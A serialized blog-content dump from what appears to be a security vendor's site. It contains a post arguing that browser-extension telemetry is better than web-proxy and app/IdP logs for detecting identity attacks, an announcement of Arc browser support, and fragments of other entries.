178,"data":217305,"content":217306},{},[217307],{"nodeType":173,"value":184024,"marks":217308,"data":217309},[],{},{"nodeType":178,"data":217311,"content":217312},{},[217313,217316,217322],{"nodeType":173,"value":184031,"marks":217314,"data":217315},[],{},{"nodeType":186,"data":217317,"content":217318},{"uri":114007},[217319],{"nodeType":173,"value":184038,"marks":217320,"data":217321},[],{},{"nodeType":173,"value":184042,"marks":217323,"data":217324},[],{},{"nodeType":169,"data":217326,"content":217327},{},[217328],{"nodeType":173,"value":71801,"marks":217329,"data":217330},[],{},{"nodeType":178,"data":217332,"content":217333},{},[217334,217337,217343],{"nodeType":173,"value":184055,"marks":217335,"data":217336},[],{},{"nodeType":186,"data":217338,"content":217339},{"uri":114457},[217340],{"nodeType":173,"value":88194,"marks":217341,"data":217342},[],{},{"nodeType":173,"value":184065,"marks":217344,"data":217345},[],{},{"items":217347},[217348,217350],{"sys":217349,"name":18399},{"id":18398},{"sys":217351,"name":509},{"id":508},{"items":217353},[217354],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":217355},{"url":2911},{"__typename":1528,"sys":217357,"content":217359,"title":217833,"synopsis":217834,"hashTags":118,"publishedDate":217835,"slug":217836,"tagsCollection":217837,"authorsCollection":217843},{"id":217358},"7yCGcUryKQGOHYHRtipn6W",{"json":217360},{"nodeType":165,"data":217361,"content":217362},{},[217363,217370,217377,217384,217391,217398,217405,217412,217419,217426,217444,217462,217469,217476,217496,217503,217515,217558,217565,217584,217592,217599,217606,217613,217620,217627,217692,217699,217704,217711,217718,217725,217732,217751,217758,217765,217772,217779,217786,217793,217800,217807,217814,217820,217826],{"nodeType":178,"data":217364,"content":217365},{},[217366],{"nodeType":173,"value":217367,"marks":217368,"data":217369},"User web activity can be a rich source of attack detection data. To this end, most organizations today ingest some form of network traffic data for security monitoring purposes. ",[],{},{"nodeType":178,"data":217371,"content":217372},{},[217373],{"nodeType":173,"value":217374,"marks":217375,"data":217376},"Typically, network traffic data is gathered by analyzing web proxy and/or DNS logs. But, we regularly speak to organizations that are frustrated with the challenge of piecing together web traffic data, without understanding the opportunity presented by the alternatives.",[],{},{"nodeType":178,"data":217378,"content":217379},{},[217380],{"nodeType":173,"value":217381,"marks":217382,"data":217383},"Even with proxies that can terminate TLS-encrypted datastreams, it’s difficult for even expert security teams to collect and analyze any meaningful data from web proxy logs. While the kind of data needed might be technically possible to extract, the process of reconstructing proxy data to analyze the specific data points that you really need, at scale, is prohibitively complicated.",[],{},{"nodeType":178,"data":217385,"content":217386},{},[217387],{"nodeType":173,"value":217388,"marks":217389,"data":217390},"The old “needle in a haystack” adage is very apt here! Rather than trying to piece together half-broken data – overlaying noisy proxy logs with other sources such as app and IdP telemetry – we think that the browser presents a much simpler way of analyzing relevant data points, particularly when it comes to identity attacks. ",[],{},{"nodeType":178,"data":217392,"content":217393},{},[217394],{"nodeType":173,"value":217395,"marks":217396,"data":217397},"Before we get on to detection opportunities in the browser, let’s take a deeper look at the web proxy situation.",[],{},{"nodeType":169,"data":217399,"content":217400},{},[217401],{"nodeType":173,"value":217402,"marks":217403,"data":217404},"Detection based on web proxy – how does it work and what are the limitations?",[],{},{"nodeType":178,"data":217406,"content":217407},{},[217408],{"nodeType":173,"value":217409,"marks":217410,"data":217411},"Web proxies generate common data points that can be used for threat detection, particularly when looking for indicators of an endpoint compromise. They work by inspecting network traffic to and from the endpoint, which includes web activity in the browser. ",[],{},{"nodeType":178,"data":217413,"content":217414},{},[217415],{"nodeType":173,"value":217416,"marks":217417,"data":217418},"The classic use case would be inspecting traffic from an endpoint to networked servers and devices, either on the local network or over the internet (e.g. via VPN), to detect signs of suspicious/malicious behavior from the device (indicating a potential compromise). Data is then shipped to a central proxy server where it can be analyzed for indicators of malicious activity. ",[],{},{"nodeType":178,"data":217420,"content":217421},{},[217422],{"nodeType":173,"value":217423,"marks":217424,"data":217425},"The traditional proxy setup has a number of limitations: ",[],{},{"nodeType":250,"data":217427,"content":217428},{},[217429],{"nodeType":254,"data":217430,"content":217431},{},[217432],{"nodeType":178,"data":217433,"content":217434},{},[217435,217440],{"nodeType":173,"value":217436,"marks":217437,"data":217439},"The proxy needs to be in a position to intercept traffic.",[217438],{"type":370},{},{"nodeType":173,"value":217441,"marks":217442,"data":217443}," It may only be active when a user is in the office, on a VPN and/or for external web traffic only. It might not work if a user is on their home or other other Wi-Fi – e.g. when working from Starbucks, or visiting a customer site, which isn’t an ideal setup in the era of remote working.  ",[],{},{"nodeType":250,"data":217445,"content":217446},{},[217447],{"nodeType":254,"data":217448,"content":217449},{},[217450],{"nodeType":178,"data":217451,"content":217452},{},[217453,217458],{"nodeType":173,"value":217454,"marks":217455,"data":217457},"Most web traffic is protected by TLS – so a proxy has to decrypt this to inspect what’s inside.",[217456],{"type":370},{},{"nodeType":173,"value":217459,"marks":217460,"data":217461}," At the very least you’re going to need to deploy a CA cert to every endpoint. But, some websites use things like certificate pinning or other SSL-enforcement controls to straight up prevent this. Unless you’re doing TLS-termination at scale with a COTS solution, then the ability to do proxy-based monitoring is seriously limited. ",[],{},{"nodeType":235,"data":217463,"content":217464},{},[217465],{"nodeType":173,"value":217466,"marks":217467,"data":217468},"Proxies under the hood",[],{},{"nodeType":178,"data":217470,"content":217471},{},[217472],{"nodeType":173,"value":217473,"marks":217474,"data":217475},"Let’s pop the hood and take a look at the data you can collect using a web proxy that is useful for threat detection. ",[],{},{"nodeType":178,"data":217477,"content":217478},{},[217479,217483,217492],{"nodeType":173,"value":217480,"marks":217481,"data":217482},"Typically, you’re looking at data points such as domain names or IP addresses. If the proxy is terminating TLS, you might also have web URLs, the type of web content accessed, and other HTTP-level metadata. Higher level data like file uploads/downloads can sometimes be reconstructed when using very vanilla methods. More advanced proxies might run or open downloaded files in a sandbox for dynamic analysis to identify potentially malicious properties, which has ",[],{},{"nodeType":186,"data":217484,"content":217486},{"uri":217485},"https://www.cyfirma.com/research/html-smuggling-a-stealthier-approach-to-deliver-malware/",[217487],{"nodeType":173,"value":217488,"marks":217489,"data":217491},"given rise to techniques like HTML smuggling",[217490],{"type":194},{},{"nodeType":173,"value":217493,"marks":217494,"data":217495}," to hide these file downloads from advanced proxies. ",[],{},{"nodeType":178,"data":217497,"content":217498},{},[217499],{"nodeType":173,"value":217500,"marks":217501,"data":217502},"In practice this means that you might see that an endpoint at IP address X accessed google.com. If it’s an authenticated proxy, you might see the user of the endpoint as well. Using this data, it’s possible to see which endpoint’s owner accessed the web domain, but not the identity/account they used, or whether they actually logged in at all. So for the majority of in-house proxy setups not doing TLS-termination… that’s it. Even then, without decrypting TLS you can’t be sure you’re seeing the actual/final domain because of technologies like domain fronting that are commonly implemented in modern CDNs. ",[],{},{"nodeType":178,"data":217504,"content":217505},{},[217506,217510],{"nodeType":173,"value":217507,"marks":217508,"data":217509},"With TLS termination, it’s possible to see a lot more by inspecting/unpacking the HTTP data. At this point there are two possible approaches: Manual analysis after the fact, or automated analysis on the fly. ",[],{},{"nodeType":173,"value":217511,"marks":217512,"data":217514},"Unfortunately, there are problems with both options. ",[217513],{"type":370},{},{"nodeType":250,"data":217516,"content":217517},{},[217518,217538],{"nodeType":254,"data":217519,"content":217520},{},[217521],{"nodeType":178,"data":217522,"content":217523},{},[217524,217529,217533],{"nodeType":173,"value":217525,"marks":217526,"data":217528},"There is too much HTTP data to store and manually analyze everything:",[217527],{"type":370},{},{"nodeType":173,"value":217530,"marks":217531,"data":217532}," Usually, organizations limit the data being stored to specific metadata as opposed to trying to store everything (terabytes of data per day), which would be impossibly expensive to store (and also to build the server infrastructure required to index and search it – effectively a mini-datacenter). ",[],{},{"nodeType":173,"value":217534,"marks":217535,"data":217537},"Not to mention that storing detailed HTTP body data presents a significant security risk, as it includes valid session tokens/cookies for all your identities…  ",[217536],{"type":1646},{},{"nodeType":254,"data":217539,"content":217540},{},[217541],{"nodeType":178,"data":217542,"content":217543},{},[217544,217549,217553],{"nodeType":173,"value":217545,"marks":217546,"data":217548},"Each web app is custom, making automated analysis (virtually) impossible:",[217547],{"type":370},{},{"nodeType":173,"value":217550,"marks":217551,"data":217552}," Proxy-based solutions have to reconstruct the data after TLS encryption. HTTP data is usually stored in large application JSON/XML objects or even in totally custom encoding – per each app. This means that complex, custom code is required per each app to be able to perform automated analysis. When businesses today are using hundreds of apps on average, ",[],{},{"nodeType":173,"value":217554,"marks":217555,"data":217557},"automating this process is not feasible as it requires constant reverse engineering of every web app. ",[217556],{"type":370},{},{"nodeType":178,"data":217559,"content":217560},{},[217561],{"nodeType":173,"value":217562,"marks":217563,"data":217564},"So what does this mean? Well, even organizations with a TLS-terminating proxy are limited to manual analysis of select metadata after-the-fact, which massively reduces its utility. You could sink a day or more’s analysis into gathering a small amount of useful data, for example whether a URL was accessed, but not necessarily which device/user, or what account/creds were used to log in). This means you’re probably going to use proxy data to aid in the investigation of a known incident rather than anything proactive. ",[],{},{"nodeType":178,"data":217566,"content":217567},{},[217568,217573,217579],{"nodeType":173,"value":217569,"marks":217570,"data":217572},"It might be ",[217571],{"type":370},{},{"nodeType":173,"value":217574,"marks":217575,"data":217578},"theoretically",[217576,217577],{"type":1646},{"type":370},{},{"nodeType":173,"value":217580,"marks":217581,"data":217583}," possible to sift through decrypted HTTP data to identify and correlate identities and actions, effectively reconstructing web pages from the network traffic automatically and on the fly (in the same way that it’s theoretically possible to remove my head and transplant it onto your body), but is it practical or reasonable for most organizations to do this? No. ",[217582],{"type":370},{},{"nodeType":169,"data":217585,"content":217586},{},[217587],{"nodeType":173,"value":217588,"marks":217589,"data":217591},"Browser data: a better alternative?",[217590],{"type":370},{},{"nodeType":178,"data":217593,"content":217594},{},[217595],{"nodeType":173,"value":217596,"marks":217597,"data":217598},"One way of overcoming some of the limitations of the classic web proxy setup is to use a browser-based solution. It’s much easier to collect data at the browser level before it’s encrypted. ",[],{},{"nodeType":178,"data":217600,"content":217601},{},[217602],{"nodeType":173,"value":217603,"marks":217604,"data":217605},"A browser agent isn’t just a proxy for pre-TLS HTML data, though. In the browser, you’re able to dynamically interact with the DOM or the rendered web application, including its JS code. This makes it easy to find, for example, input fields for usernames and passwords. You can see what information the user is inputting and where, without needing to figure out how the data is encoded and sent back to the app. These are fairly generic fields that can be identified across your suite of apps without needing complex custom code. To put it in perspective, approximately 10 login cases cover the entirety of the SaaS apps we support (~1000). Using a proxy-based solution, each of these would require custom development.   ",[],{},{"nodeType":178,"data":217607,"content":217608},{},[217609],{"nodeType":173,"value":217610,"marks":217611,"data":217612},"While it's technically possible to keep track of multiple sessions for thousands of users across hundreds of apps via proxy, it’s no mean feat – made much easier when each extension is tracking one user, in one browser, and even knows the browser tab it’s running in. You also get additional context at the identity layer such as the email address, authentication protocol, and credentials used, neatly mapped to that specific user and browser profile – no more trying to link the owner of an IP address to log events!",[],{},{"nodeType":178,"data":217614,"content":217615},{},[217616],{"nodeType":173,"value":217617,"marks":217618,"data":217619},"The browser also has the added benefit of being a natural enforcement point. You can collect and analyze data dynamically, and produce an immediate response – rather than taking info away, analyzing it, and coming back with a detection minutes or hours later (and potentially prompting a manual response). ",[],{},{"nodeType":178,"data":217621,"content":217622},{},[217623],{"nodeType":173,"value":217624,"marks":217625,"data":217626},"Let’s look at a couple of examples based on how we’re using our browser agent to detect and block identity attacks. ",[],{},{"nodeType":250,"data":217628,"content":217629},{},[217630,217651,217671],{"nodeType":254,"data":217631,"content":217632},{},[217633],{"nodeType":178,"data":217634,"content":217635},{},[217636,217639,217647],{"nodeType":173,"value":37,"marks":217637,"data":217638},[],{},{"nodeType":186,"data":217640,"content":217641},{"uri":9099},[217642],{"nodeType":173,"value":217643,"marks":217644,"data":217646},"Pinning passwords to the legitimate site they are linked with",[217645],{"type":194},{},{"nodeType":173,"value":217648,"marks":217649,"data":217650},". This is made possible by interacting with the DOM to observe passwords being entered – enabling the Push agent to intercept and block before an HTTP network request can even be made. ",[],{},{"nodeType":254,"data":217652,"content":217653},{},[217654],{"nodeType":178,"data":217655,"content":217656},{},[217657,217660,217667],{"nodeType":173,"value":37,"marks":217658,"data":217659},[],{},{"nodeType":186,"data":217661,"content":217662},{"uri":75048},[217663],{"nodeType":173,"value":217664,"marks":217665,"data":217666},"Detecting and blocking malicious phishing tools",[],{},{"nodeType":173,"value":217668,"marks":217669,"data":217670}," running on websites by observing behavioral attributes in the browser, such as Javascript calls being made or data structures saved to local storage.",[],{},{"nodeType":254,"data":217672,"content":217673},{},[217674],{"nodeType":178,"data":217675,"content":217676},{},[217677,217680,217688],{"nodeType":173,"value":37,"marks":217678,"data":217679},[],{},{"nodeType":186,"data":217681,"content":217683},{"uri":217682},"https://pushsecurity.com/blog/manage-third-party-data-access/",[217684],{"nodeType":173,"value":217685,"marks":217686,"data":217687},"Observing users signing up to and using risky apps",[],{},{"nodeType":173,"value":217689,"marks":217690,"data":217691},", or changing or removing authentication methods, MFA methods, and configuration methods, which could indicate account takeover. ",[],{},{"nodeType":178,"data":217693,"content":217694},{},[217695],{"nodeType":173,"value":217696,"marks":217697,"data":217698},"It’s always useful to refer back to the concept of the Pyramid of Pain in these situations. The opportunities to detect and block in the browser tend to align with indicators at the apex of the pyramid, meaning they are a significant obstruction for attackers – and difficult to circumvent. This contrasts the indicators aligned with proxy-based solutions, which are much easier to bypass through, for example, IP masking using residential proxy networks, or changing the domains and URLs used for phishing campaigns.  ",[],{},{"nodeType":312,"data":217700,"content":217703},{"target":217701},{"sys":217702},{"id":75120,"type":317,"linkType":318},[],{"nodeType":178,"data":217705,"content":217706},{},[217707],{"nodeType":173,"value":217708,"marks":217709,"data":217710},"In summary: Browser data provides high-fidelity indicators of malicious activity, without the complications of proxy-based approaches. The scope for response in the browser is significant and immediate, meaning it’s a great enforcement point for security controls to be able to disrupt attacks. ",[],{},{"nodeType":169,"data":217712,"content":217713},{},[217714],{"nodeType":173,"value":217715,"marks":217716,"data":217717},"Won’t my app and IdP logs cover this?",[],{},{"nodeType":178,"data":217719,"content":217720},{},[217721],{"nodeType":173,"value":217722,"marks":217723,"data":217724},"App and IdP logs are useful (when you can get them), but neither give you the full picture. ",[],{},{"nodeType":235,"data":217726,"content":217727},{},[217728],{"nodeType":173,"value":217729,"marks":217730,"data":217731},"App logs are limited in availability, scope, and ease of ingestion ",[],{},{"nodeType":178,"data":217733,"content":217734},{},[217735,217739,217747],{"nodeType":173,"value":217736,"marks":217737,"data":217738},"When relying on app logs, you’re naturally constrained by the app provider. Many smaller apps provide no security logging, while others ",[],{},{"nodeType":186,"data":217740,"content":217741},{"uri":115077},[217742],{"nodeType":173,"value":217743,"marks":217744,"data":217746},"lock security logging behind the premium tier subscription",[217745],{"type":194},{},{"nodeType":173,"value":217748,"marks":217749,"data":217750},". When logs are available, you’re limited to the events that the third-party deems suitable to log. ",[],{},{"nodeType":178,"data":217752,"content":217753},{},[217754],{"nodeType":173,"value":217755,"marks":217756,"data":217757},"Out of the 100 most popular apps we see across our customers, and perhaps the few dozen or so that are security critical, only a small handful provide any useful logging. This means, naturally, that the majority of apps do not. ",[],{},{"nodeType":178,"data":217759,"content":217760},{},[217761],{"nodeType":173,"value":217762,"marks":217763,"data":217764},"To top it all off, the process of extracting these logs and feeding them into your SIEM (or equivalent) is also not straightforward. The lack of out-of-the-box connectors for many apps means that complex custom architectures are required for collecting data. Some vendors place constraints on the format and mechanism for extracting logs which can make ingestion difficult to feed reliable detections – even before any meaningful analysis of the data can take place. ",[],{},{"nodeType":178,"data":217766,"content":217767},{},[217768],{"nodeType":173,"value":217769,"marks":217770,"data":217771},"Until application security logs are made widely available (and at no additional cost) it’s unlikely you’re going to be able to get the visibility you need from app logs, for every app your employees use (though of course there are exceptions – and we hope to see more vendors in future treating security as a minimum requirement, not a chargeable addon). ",[],{},{"nodeType":235,"data":217773,"content":217774},{},[217775],{"nodeType":173,"value":217776,"marks":217777,"data":217778},"IdP logs cover only SSO integrated apps and are limited in scope",[],{},{"nodeType":178,"data":217780,"content":217781},{},[217782],{"nodeType":173,"value":217783,"marks":217784,"data":217785},"You might think, “but all of our business apps are behind SSO, right?” In reality, only about 1 in 3 apps support SSO (and even fewer at the ‘free’ tier). And in practice, our data shows us that only 1 in 5 apps on average are actually behind SSO per organization. The theoretical security benefit of IdP logs is that they provide context, a foundation for the user’s activity across (and between) a suite of apps. But because of the lack of coverage, this isn’t the case. ",[],{},{"nodeType":178,"data":217787,"content":217788},{},[217789],{"nodeType":173,"value":217790,"marks":217791,"data":217792},"IdP logs are naturally focused on authentication, and so don’t compensate for any gaps in app logging. Naturally, they are only able to observe what happens on the IdP side – and so are blind to client side attacks like phishing (which we’ve already shown the browser provides superior visibility of compared to typical alternatives like proxy logs).   ",[],{},{"nodeType":235,"data":217794,"content":217795},{},[217796],{"nodeType":173,"value":217797,"marks":217798,"data":217799},"Browser is best for stopping identity attacks",[],{},{"nodeType":178,"data":217801,"content":217802},{},[217803],{"nodeType":173,"value":217804,"marks":217805,"data":217806},"This is where the browser comes in. Think of your browser as your source of truth, a broad data baseline for user activity where the browser provides complete context of the browser profile, employee, accounts, credentials, auth methods, and MFA types – as well as employee interaction with web sites.",[],{},{"nodeType":178,"data":217808,"content":217809},{},[217810],{"nodeType":173,"value":217811,"marks":217812,"data":217813},"The TL;DR is that your visibility in the browser is theoretically limitless. Every page loaded (and its source, javascript state, local storage), every user interaction can be observed. And best of all, this analysis is done securely in the browser and only the results of detections are reported back, rather than decrypting the entire raw traffic stream including all session data in an additional centralized system. ",[],{},{"nodeType":312,"data":217815,"content":217819},{"target":217816},{"sys":217817},{"id":217818,"type":317,"linkType":318},"5jPCGPO1tnIkoI7MKW4oUi",[],{"nodeType":169,"data":217821,"content":217822},{},[217823],{"nodeType":173,"value":40632,"marks":217824,"data":217825},[],{},{"nodeType":178,"data":217827,"content":217828},{},[217829],{"nodeType":173,"value":217830,"marks":217831,"data":217832},"As an industry, we need to start looking at browser-based detection and response as the next logical evolution to stop identity attacks. There are clear parallels with the emergence of EDR – which came about because existing endpoint log sources were not sufficient. Today, we wouldn’t dream of trying to detect and respond to endpoint-based attacks without EDR – it’s time we started thinking about cloud identity attacks and the browser in the same way.  ",[],{},"The web proxy is dead… long live the browser extension!","Right now the majority of detections for identity attacks rely on web proxy telemetry. Here’s why the browser can be a better alternative.","2024-06-11T00:00:00.000Z","the-web-proxy-is-dead-long-live-the-browser-extension",{"items":217838},[217839,217841],{"sys":217840,"name":509},{"id":508},{"sys":217842,"name":505},{"id":504},{"items":217844},[217845],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":217846},{"url":1496},{"items":217848},[217849],{"fullName":217850,"firstName":118110,"jobTitle":514,"profilePicture":217851},"Kevin Diffily",{"url":217852},"https://images.ctfassets.net/y1cdw1ablpvd/5hKAGAnsn4x4FU7VAAjg2h/1b4b0725efb6313423abf861601a2a82/IMG_1215.png",{"json":217854,"links":218036},{"nodeType":165,"data":217855,"content":217856},{},[217857,217864,217884,217891,217898,217905,217925,217932,217939,217945,217952,217959,217966,217999,218015,218022,218029],{"nodeType":178,"data":217858,"content":217859},{},[217860],{"nodeType":173,"value":217861,"marks":217862,"data":217863},"Push is committed to developing support for a wide variety of browsers used in the workplace. To date, we’ve supported commonly used browsers like Google Chrome, Safari, Microsoft Edge, Firefox, and Brave. ",[],{},{"nodeType":178,"data":217865,"content":217866},{},[217867,217871,217880],{"nodeType":173,"value":217868,"marks":217869,"data":217870},"Now we’ve introduced support for ",[],{},{"nodeType":186,"data":217872,"content":217874},{"uri":217873},"https://arc.net/",[217875],{"nodeType":173,"value":217876,"marks":217877,"data":217879},"Arc",[217878],{"type":194},{},{"nodeType":173,"value":217881,"marks":217882,"data":217883},", an increasingly popular browser with developers and engineers that integrates standard browsing with its own applications using a sidebar. ",[],{},{"nodeType":169,"data":217885,"content":217886},{},[217887],{"nodeType":173,"value":217888,"marks":217889,"data":217890},"Why develop support for Arc?",[],{},{"nodeType":178,"data":217892,"content":217893},{},[217894],{"nodeType":173,"value":217895,"marks":217896,"data":217897},"As Push continues its quest to stop identity attacks, we are always looking for new ways to deliver our services across the different locales in which our users operate – namely, different browsers. ",[],{},{"nodeType":178,"data":217899,"content":217900},{},[217901],{"nodeType":173,"value":217902,"marks":217903,"data":217904},"Most organizations do not designate a single browser that their employees must use. Our browser agent allows businesses to facilitate user flexibility and enjoy the advantages of their chosen browser(s), without sacrificing security. ",[],{},{"nodeType":178,"data":217906,"content":217907},{},[217908,217912,217921],{"nodeType":173,"value":217909,"marks":217910,"data":217911},"Recently, we’ve seen an uptick in requests for support of Arc, which is a newer browser built using ",[],{},{"nodeType":186,"data":217913,"content":217915},{"uri":217914},"https://www.chromium.org/chromium-projects/",[217916],{"nodeType":173,"value":217917,"marks":217918,"data":217920},"Chromium",[217919],{"type":194},{},{"nodeType":173,"value":217922,"marks":217923,"data":217924},". Arc reimagines the browser, integrating various applications into its interface and bringing nearly all of the user’s functions into a single access point. Its tech-forward nature, customizations, privacy, and fresh take on how UX should work in browsers has proven to be popular with developers, engineers, and other highly tech-savvy early adopters.",[],{},{"nodeType":178,"data":217926,"content":217927},{},[217928],{"nodeType":173,"value":217929,"marks":217930,"data":217931},"Given the increased interest in the browser, we began developing a solution for companies with employees using Arc on work devices. Security teams can enable it with one click within our platform, and it cannot be altered by the end user (though they do have full transparency into the settings via our extension). ",[],{},{"nodeType":178,"data":217933,"content":217934},{},[217935],{"nodeType":173,"value":217936,"marks":217937,"data":217938},"Since Arc is built on Chromium, it inherits a number of Google Chrome’s features – namely, managing security controls at the policy level. Our users can now deploy the Push browser extension to Arc using a managed deployment on MacOS machines.",[],{},{"nodeType":312,"data":217940,"content":217944},{"target":217941},{"sys":217942},{"id":217943,"type":317,"linkType":318},"Df7iStjA2mA1ueB8OQjIB",[],{"nodeType":178,"data":217946,"content":217947},{},[217948],{"nodeType":173,"value":217949,"marks":217950,"data":217951},"This new feature was rolled out in early July to our existing customers, and within days it was more widely enabled in our platform than Safari. Push is committed to the browser as the future of security, and our support for Arc only furthers our effort to meet the needs of our customers and demonstrates our agility in being able to adapt to customer requirements. ",[],{},{"nodeType":169,"data":217953,"content":217954},{},[217955],{"nodeType":173,"value":217956,"marks":217957,"data":217958},"The browser is the best place to stop identity attacks",[],{},{"nodeType":178,"data":217960,"content":217961},{},[217962],{"nodeType":173,"value":217963,"marks":217964,"data":217965},"Since modern work happens in the browser, it’s also the place where identity attacks happen. Being in the browser allows Push to do a few things that other security tools and control points struggle with:",[],{},{"nodeType":250,"data":217967,"content":217968},{},[217969,217979,217989],{"nodeType":254,"data":217970,"content":217971},{},[217972],{"nodeType":178,"data":217973,"content":217974},{},[217975],{"nodeType":173,"value":217976,"marks":217977,"data":217978},"Get the broadest visibility across all workforce identities, including unmanaged identities outside your IdP.",[],{},{"nodeType":254,"data":217980,"content":217981},{},[217982],{"nodeType":178,"data":217983,"content":217984},{},[217985],{"nodeType":173,"value":217986,"marks":217987,"data":217988},"Generate the best telemetry for detecting identity attack TTPs and tools such as AitM and BitM toolkits, and unauthorized sessions using stolen tokens.",[],{},{"nodeType":254,"data":217990,"content":217991},{},[217992],{"nodeType":178,"data":217993,"content":217994},{},[217995],{"nodeType":173,"value":217996,"marks":217997,"data":217998},"Automatically enforce controls that either stop attacks in real time or block employees from taking risky actions like creating a new identity with a stolen password. ",[],{},{"nodeType":178,"data":218000,"content":218001},{},[218002,218005,218012],{"nodeType":173,"value":195976,"marks":218003,"data":218004},[],{},{"nodeType":186,"data":218006,"content":218007},{"uri":75099},[218008],{"nodeType":173,"value":195983,"marks":218009,"data":218011},[218010],{"type":194},{},{"nodeType":173,"value":1477,"marks":218013,"data":218014},[],{},{"nodeType":178,"data":218016,"content":218017},{},[218018],{"nodeType":173,"value":218019,"marks":218020,"data":218021},"To summarize, the browser is quickly becoming the new OS, so you can think of Push as the equivalent of an EDR agent for defending workforce identities. Naturally, we want to support as many popular browsers as possible so all users can benefit from enhanced identity protection.",[],{},{"nodeType":169,"data":218023,"content":218024},{},[218025],{"nodeType":173,"value":218026,"marks":218027,"data":218028},"Where else are your employees working?",[],{},{"nodeType":178,"data":218030,"content":218031},{},[218032],{"nodeType":173,"value":218033,"marks":218034,"data":218035},"Adding support for Arc isn’t the end of the road. We’re always looking for opportunities to meet our customers where they work. If you’re using a browser that we don’t currently support, let us know – we’d be happy to add it to the roadmap!",[],{},{"entries":218037},{"hyperlink":218038,"inline":218039,"block":218040},[],[],[218041],{"sys":218042,"__typename":5345,"title":218043,"caption":118,"layoutMode":118,"file":218044},{"id":217943},"Arc browser configuration",{"url":218045,"width":218046,"height":218047},"https://images.ctfassets.net/y1cdw1ablpvd/7jPSCsFlMhYvCdSM6ytzKL/7a78975c84592082a98507b9062d5565/image1.png",1356,1026,"content:blog:push-introduces-support-for-arc-browser-securing-users-wherever-they-work.json","blog/push-introduces-support-for-arc-browser-securing-users-wherever-they-work.json","blog/push-introduces-support-for-arc-browser-securing-users-wherever-they-work",{"_path":218052,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":218053,"ogImage":118,"summary":218055,"title":140545,"subtitle":118,"metaTitle":218066,"synopsis":140546,"hashTags":118,"publishedDate":140547,"slug":140548,"tagsCollection":218067,"relatedBlogPostsCollection":218073,"authorsCollection":219377,"content":219381,"_id":219921,"_type":5439,"_source":5440,"_file":219922,"_stem":219923,"_extension":5439},"/blog/how-aitm-phishing-kits-evade-detection",{"id":139982,"publishedAt":218054},"2025-03-13T11:59:41.983Z",{"json":218056},{"data":218057,"content":218058,"nodeType":165},{},[218059],{"data":218060,"content":218061,"nodeType":178},{},[218062],{"data":218063,"marks":218064,"value":218065,"nodeType":173},{},[],"Attackers are getting creative with their AitM phishing toolkits, using several tricks to hide from the prying eyes of security teams and threat intelligence vendors. We decided to pick apart one toolkit to see exactly how it tries to hide its malicious intent. ","Analyzing AitM phish kits and the ways they evade detection",{"items":218068},[218069,218071],{"sys":218070,"name":509},{"id":508},{"sys":218072,"name":505},{"id":504},{"items":218074},[218075,218669,219091],{"__typename":1528,"sys":218076,"content":218077,"title":180854,"synopsis":180855,"hashTags":118,"publishedDate":167649,"slug":180856,"tagsCollection":218659,"authorsCollection":218665},{"id":180174},{"json":218078},{"nodeType":165,"data":218079,"content":218080},{},[218081,218087,218103,218132,218138,218143,218149,218155,218182,218188,218194,218200,218206,218212,218218,218224,218230,218236,218242,218248,218254,218260,218266,218272,218278,218284,218289,218294,218300,218306,218312,218318,218323,218329,218335,218351,218357,218373,218378,218384,218390,218396,218402,218407,218413,218419,218425,218431,218437,218442,218447,218453,218459,218465,218471,218477,218483,218488,218494,218500,218506,218512,218518,218523,218528,218534,218540,218546,218551,218557,218563,218569,218574,218580,218585,218591,218597,218612,218627,218633,218648,218653],{"nodeType":169,"data":218082,"content":218083},{},[218084],{"nodeType":173,"value":180183,"marks":218085,"data":218086},[],{},{"nodeType":178,"data":218088,"content":218089},{},[218090,218093,218100],{"nodeType":173,"value":180190,"marks":218091,"data":218092},[],{},{"nodeType":186,"data":218094,"content":218095},{"uri":74693},[218096],{"nodeType":173,"value":148689,"marks":218097,"data":218099},[218098],{"type":194},{},{"nodeType":173,"value":180201,"marks":218101,"data":218102},[],{},{"nodeType":250,"data":218104,"content":218105},{},[218106,218119],{"nodeType":254,"data":218107,"content":218108},{},[218109],{"nodeType":178,"data":218110,"content":218111},{},[218112,218116],{"nodeType":173,"value":180214,"marks":218113,"data":218115},[218114],{"type":370},{},{"nodeType":173,"value":180219,"marks":218117,"data":218118},[],{},{"nodeType":254,"data":218120,"content":218121},{},[218122],{"nodeType":178,"data":218123,"content":218124},{},[218125,218129],{"nodeType":173,"value":180229,"marks":218126,"data":218128},[218127],{"type":370},{},{"nodeType":173,"value":180234,"marks":218130,"data":218131},[],{},{"nodeType":178,"data":218133,"content":218134},{},[218135],{"nodeType":173,"value":180241,"marks":218136,"data":218137},[],{},{"nodeType":312,"data":218139,"content":218142},{"target":218140},{"sys":218141},{"id":180248,"type":317,"linkType":318},[],{"nodeType":169,"data":218144,"content":218145},{},[218146],{"nodeType":173,"value":180254,"marks":218147,"data":218148},[],{},{"nodeType":178,"data":218150,"content":218151},{},[218152],{"nodeType":173,"value":180261,"marks":218153,"data":218154},[],{},{"nodeType":178,"data":218156,"content":218157},{},[218158,218161,218165,218168,218172,218175,218179],{"nodeType":173,"value":180268,"marks":218159,"data":218160},[],{},{"nodeType":173,"value":180272,"marks":218162,"data":218164},[218163],{"type":370},{},{"nodeType":173,"value":3107,"marks":218166,"data":218167},[],{},{"nodeType":173,"value":180280,"marks":218169,"data":218171},[218170],{"type":370},{},{"nodeType":173,"value":180285,"marks":218173,"data":218174},[],{},{"nodeType":173,"value":180289,"marks":218176,"data":218178},[218177],{"type":370},{},{"nodeType":173,"value":180294,"marks":218180,"data":218181},[],{},{"nodeType":178,"data":218183,"content":218184},{},[218185],{"nodeType":173,"value":180301,"marks":218186,"data":218187},[],{},{"nodeType":169,"data":218189,"content":218190},{},[218191],{"nodeType":173,"value":180308,"marks":218192,"data":218193},[],{},{"nodeType":178,"data":218195,"content":218196},{},[218197],{"nodeType":173,"value":180315,"marks":218198,"data":218199},[],{},{"nodeType":178,"data":218201,"content":218202},{},[218203],{"nodeType":173,"value":180322,"marks":218204,"data":218205},[],{},{"nodeType":235,"data":218207,"content":218208},{},[218209],{"nodeType":173,"value":62880,"marks":218210,"data":218211},[],{},{"nodeType":178,"data":218213,"content":218214},{},[218215],{"nodeType":173,"value":180335,"marks":218216,"data":218217},[],{},{"nodeType":178,"data":218219,"content":218220},{},[218221],{"nodeType":173,"value":180342,"marks":218222,"data":218223},[],{},{"nodeType":178,"data":218225,"content":218226},{},[218227],{"nodeType":173,"value":180349,"marks":218228,"data":218229},[],{},{"node